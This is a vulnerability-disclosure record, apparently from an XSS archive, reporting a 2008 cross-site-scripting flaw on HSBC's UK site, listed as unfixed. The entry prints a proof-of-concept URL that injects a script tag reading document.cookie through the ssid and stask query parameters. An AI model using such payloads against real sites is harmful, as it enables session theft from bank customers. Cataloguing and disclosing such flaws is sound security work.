Security researcher PaPPy, has submitted on 21/06/2008 a cross-site-scripting (XSS) vulnerability affecting www.hsbc.co.uk, which at the time of submission ranked 996 on the web according to Alexa.
We manually validated and published a mirror of this vulnerability on 21/06/2008. It is currently unfixed.
If you believe that this security issue has been corrected, please send us an e-mail. |
Date submitted: 21/06/2008 |
Date published: 21/06/2008 |
Fixed? Mail us! | Status: UNFIXED |
Author: PaPPy |
Domain: www.hsbc.co.uk |
Category: XSS |
Pagerank: 996 |
URL: http://www.hsbc.co.uk/1/2/!ut/p/kcxml/04_Sj9SPykssy0xPLMnMz0vM0Y_QjzKLN4l39gLJmMU7xRub6kciixjEO8IFgv S99X098nNT9QP0C3JDI8odHRUBf0CB6A!!/delta/base64xml/L0lKayEvd0ZNQURBISEvNElFRS9JbnRlcm5hbFNlYXJjaA!!; jsessionid=0000rsZl-xiCINNAwwljLaBjmJQ:12ntf1n0a?sq=--%3Etesticles&st=1&ssid=%22%3E%3Cscript%3Ealert (document.cookie);%3C/script%3E&stask=%22%3E%3Cscript%3Ealert(document.cookie);%3C/script%3EEUKUKA00 01 |
Click here to view the mirror
|
|
|